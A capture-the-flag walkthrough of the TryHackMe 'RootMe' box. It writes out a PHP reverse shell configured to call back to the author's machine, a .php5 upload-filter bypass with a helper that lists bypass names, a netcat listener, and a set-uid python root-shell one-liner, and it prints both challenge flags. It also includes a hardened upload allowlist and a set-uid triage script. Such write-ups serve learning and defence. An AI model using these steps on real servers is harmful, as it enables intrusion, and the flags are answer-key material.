TryHackMe — RootMe

Count Zer0
6 min read · Feb 16, 2021

RootMe is a CTF for beginners. It was the first TryHackMe box I completed entirely by myself. It’s pretty easy to hack, but it did introduce a few wrinkles I hadn’t encountered before. For example, I had to research how to bypass file upload restrictions. I ended up using an alternative extension to upload a PHP file. That allowed me to establish a reverse shell. Ultimately, I was able to gain root and hack the box. Here’s a brief overview of some of the techniques used:

  • Port scanning
  • URI enumeration
  • PHP reverse shell
  • Privilege escalation

Sound good? Let’s start hacking!

Now we're playing with power!

Once I had deployed the box, the first step was reconnaissance. I needed to gain as much info as possible on open ports and running services. I had no particular reason to be stealthy, so I ran an aggressive scan: nmap -A 10.10.193.164 (-A turns on OS detection, version detection, the default script set and traceroute in one go). It showed OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 on port 22 and Apache httpd 2.4.29 on port 80. The operating system was Ubuntu Linux.

Always so aggressive

I decided to pull up 10.10.193.164 in my browser, thinking maybe I could find a clue in the source code. Instead of a clue, however, the page offered me a challenge. Can I root it?

You bet I can!

After confirming there was nothing hidden in the source code, I decided to look for hidden directories. That meant running gobuster -w /usr/share/dirb/wordlists/big.txt dir -u 10.10.193.164, which found several paths. The /panel and /uploads pages both merited further investigation.

Gotta love Gobuster

The /panel page appeared to be used to upload files. I uploaded a test file and then navigated to /uploads. I couldn't believe my eyes. Turns out anyone can upload files and then view them in the uploads folder, and Apache serves that folder directly. This was a huge vulnerability, and I was going to make them pay. If I could upload a payload and get the server to execute it, I would be able to establish a reverse shell.

Pretty straight-forward

The ideal choice for this exploit would be a PHP script, because the web server already runs PHP: if my file is interpreted, the server itself connects back to me and becomes my gateway into the machine. I used wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php to download a good PHP reverse shell script to my Kali box. Now I just needed to customize the payload.

Downloading the PHP reverse shell script

In order to do that, I used nano php-reverse-shell.php and edited the script. It's a simple PHP reverse shell, so all I needed to change was the IP address of my Kali box and the listening port. I set $ip to my TryHackMe VPN (tun0) address and $port to 4444 and saved the changes.

Updating the script

Once back at the command line, I used chmod +x php-reverse-shell.php to make the file executable before trying to upload it. (Strictly speaking this step isn't needed: Apache hands the file to the PHP interpreter regardless of its mode bits, and the bits don't survive an HTTP upload anyway.)

Time to execute!

Back in the browser I attempted to upload the file on the 10.10.193.164/panel page but received an error message. It was in Portuguese, but it wasn't hard to figure out that PHP files were not permitted. The panel was doing some kind of file-name (extension) validation.

PHP não é permitido! (PHP is not allowed!)

This was the first time I had run into that particular problem, so I googled how to bypass file name validation. It turned out the filter only rejected the literal .php extension, so all I needed was to rename the file to the less common .php5 with mv php-reverse-shell.php php-reverse-shell.php5. The trick works because Apache's mod_php configuration on Ubuntu maps several alternate extensions (the numbered .php3/.php4/.php5/.php7 variants and .phtml) to the PHP handler, so the server still interprets the file as PHP. Had .php5 been blocked too, .phtml or .phar would have been the next candidates; which ones actually execute depends on the server's handler mapping, not on the upload filter alone.

With the extension changed to a less common alternative, I was able to successfully upload the PHP reverse shell payload to the /uploads folder.

Sucesso! (Success!)
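To see exactly why renaming to .php5 got past the check, here is an added example (my own code, not the RootMe panel's source, which this write-up never shows): a reconstruction of an extension blacklist that rejects only .php, next to an allowlist check that refuses every PHP-handled extension, plus a helper that lists the names worth trying when a .php upload is refused. The PHP_HANDLED set is my assumption about what Ubuntu's mod_php FilesMatch rule covers, and the sample filenames are constructed.

```python
import os
import re

# Extensions Apache's mod_php handler on Ubuntu treats as PHP (assumption:
# based on the FilesMatch rule in php7.x.conf; verify on the target).
PHP_HANDLED = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}

# What an image/document upload panel could legitimately accept.
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".txt", ".pdf"}


def weak_blacklist_check(filename):
    """Reconstruction of the panel's check: accept anything whose final
    extension is not exactly '.php'. Returns True when the upload is allowed."""
    return os.path.splitext(filename)[1].lower() != ".php"


def hardened_allowlist_check(filename):
    """Accept only a bare filename with a single extension from ALLOWED.
    Rejects 'shell.php5', 'shell.phtml', 'shell.php.jpg' and path tricks."""
    if filename != os.path.basename(filename) or filename in ("", ".", ".."):
        return False
    stem, ext = os.path.splitext(filename)
    if "." in stem or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False
    return ext.lower() in ALLOWED


def will_execute_as_php(filename):
    """Would Apache run this file as PHP once it sits in /uploads?  The
    FilesMatch rule anchors on the final extension, so 'x.php.jpg' is not run."""
    return os.path.splitext(filename)[1].lower() in PHP_HANDLED


def bypass_candidates(filename):
    """Names to try when the '.php' upload is rejected: those the weak check
    lets through and the server still interprets as PHP."""
    stem = os.path.splitext(filename)[0]
    return [stem + ext for ext in sorted(PHP_HANDLED)
            if weak_blacklist_check(stem + ext) and will_execute_as_php(stem + ext)]


def compare(filenames):
    """Run both checks over a list of names -> {name: (weak_ok, strict_ok, runs_as_php)}."""
    return {f: (weak_blacklist_check(f), hardened_allowlist_check(f), will_execute_as_php(f))
            for f in filenames}


if __name__ == "__main__":
    # Constructed sample uploads, including the one from the write-up.
    for name, (weak, strict, runs) in compare(
            ["photo.jpg", "php-reverse-shell.php", "php-reverse-shell.php5",
             "shell.phtml", "shell.php.jpg"]).items():
        print(f"{name:24} blacklist={'ok' if weak else 'NO':3} "
              f"allowlist={'ok' if strict else 'NO':3} runs_as_php={runs}")
    print("worth trying:", bypass_candidates("php-reverse-shell.php"))
```

The point of the comparison is the third column: the blacklist accepts php-reverse-shell.php5 and shell.phtml, and both of those still execute as PHP, whereas the allowlist rejects everything that is not a plain image or document name. A real fix also stores uploads under a server-generated name and outside the web root.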

I navigated to the /uploads folder and saw my PHP reverse shell. Once I requested the file, Apache would run it as PHP on the server and the script would call back to my Kali box. Once I had that, I'd be home free.

My reverse shell awaits!

I set up a Netcat listener on my Kali box with nc -lvnp 4444 and clicked the php-reverse-shell.php5 file in the /uploads folder to execute it. Success! I had a shell, but it was a dumb (non-TTY) shell. That can be fixed.

Nothing worse than a dumb shell

To fix that I used the standard TTY upgrade. First, python -c 'import pty;pty.spawn("/bin/bash")' spawned bash inside a pseudo-terminal on the target. Then I hit Ctrl-Z to suspend the Netcat session and get my Kali prompt back, typed stty raw -echo so my local terminal would pass keystrokes (including Ctrl-C and tab) straight through to the remote shell, and ran fg to bring the listener back into the foreground. Finally, export TERM=xterm told programs on the target what kind of terminal they were talking to. That gave me tab completion, command history and a working clear, none of which the raw shell had.

Gotta have tab completion!

I searched for the user.txt file with the command find / -type f -name user.txt and was able to locate the file in /var/www. The first flag was THM{y0u_g0t_a_sh3ll}.

Found it!

Once I had located the user.txt file, I looked for set-uid binaries owned by root with find / -type f -user root -perm -4000 2>/dev/null (-perm -4000 matches files with the set-uid bit, and 2>/dev/null hides the permission-denied noise). /usr/bin/python stood out immediately: an interpreter that runs with root's effective UID is a root shell waiting to happen.

Running python as root 🐍

Because the python binary was set-uid root, python -c 'import os;os.execl("/bin/sh","sh","-p")' replaced the interpreter with /bin/sh while keeping the effective UID of 0; the -p flag tells the shell not to drop that inherited effective UID back to my real UID (bash in particular resets it otherwise), and id shows euid=0(root) afterwards. Once I had that, I navigated to /root and found the last flag: THM{pr1v1l3g3_3sc4l4t10n}.

It’s been a privilege…
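As an added example (not part of the write-up) of how to triage that find output rather than reading twenty paths by eye: the script below separates the set-uid root files every stock Ubuntu 18.04 host has from the ones that should not be there, flags anomalies that are interpreters able to exec a shell, and wraps the escalation condition the python one-liner relies on so it can be checked before exec'ing. The baseline set and the sample find output are my assumptions, constructed for illustration, so diff the baseline against a clean host of the same release before trusting it.

```python
import os

# Set-uid root files on a stock Ubuntu 18.04 host (assumption, from memory of
# a clean install; compare against a known-good box of the same release).
UBUNTU_1804_BASELINE = {
    "/bin/fusermount", "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgidmap",
    "/usr/bin/newgrp", "/usr/bin/newuidmap", "/usr/bin/passwd", "/usr/bin/pkexec",
    "/usr/bin/sudo", "/usr/bin/traceroute6.iputils",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/snapd/snap-confine", "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
}

# Binaries that hand over a root shell outright when set-uid, because they
# can exec another program while keeping the effective UID.
SHELL_SPAWNERS = {"python", "python2", "python2.7", "python3", "perl", "ruby",
                  "php", "node", "bash", "sh", "dash", "find", "env", "vim"}

# Constructed to resemble 'find / -type f -user root -perm -4000 2>/dev/null'
# on the box; not a capture from the write-up.
SAMPLE_FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/python
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
"""


def parse_find_output(text):
    """Keep only absolute paths, so stray 'Permission denied' lines are ignored
    even if stderr got mixed into the capture."""
    return [line.strip() for line in text.splitlines() if line.strip().startswith("/")]


def triage(paths, baseline=UBUNTU_1804_BASELINE):
    """Split the listing into expected files, anomalies, and anomalies that are
    known shell spawners (the ones to try first)."""
    unexpected = [p for p in paths if p not in baseline]
    spawners = [p for p in unexpected if os.path.basename(p) in SHELL_SPAWNERS]
    return {"expected": [p for p in paths if p in baseline],
            "unexpected": unexpected,
            "shell_spawners": spawners}


def would_escalate(uid, euid):
    """The condition the one-liner relies on: the interpreter is running with an
    effective UID of root that differs from the real UID."""
    return euid == 0 and uid != 0


def spawn_root_shell():
    """Run this *through the set-uid interpreter* on the target (for example
    /usr/bin/python suid_shell.py). Execs sh -p so the shell keeps euid 0 instead
    of dropping back to the real UID; returns False when the process is not
    actually set-uid root, so calling it elsewhere is harmless."""
    if not would_escalate(os.getuid(), os.geteuid()):
        return False
    os.execl("/bin/sh", "sh", "-p")  # does not return on success


if __name__ == "__main__":
    result = triage(parse_find_output(SAMPLE_FIND_OUTPUT))
    print("unexpected set-uid files:", result["unexpected"])
    print("try these first:", result["shell_spawners"])
    if not spawn_root_shell():
        print("not running set-uid root; nothing to escalate here")
```

Run stand-alone on the sample, only /usr/bin/python lands in the unexpected list, which is the same conclusion the manual read-through reached, but the baseline comparison scales to hosts with many more set-uid files and catches odd entries that are not famous interpreters.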

I definitely enjoyed rooting this box. It’s simple but satisfying, and I learned about bypassing file name validation in the process. I would definitely recommend it to anyone looking to practice and hone their skills.

Here’s a listing of some of the tools and commands I used in this hack:

  • nmap
  • gobuster
  • PHP reverse shell
  • nano
  • alternative extensions
  • netcat
  • python
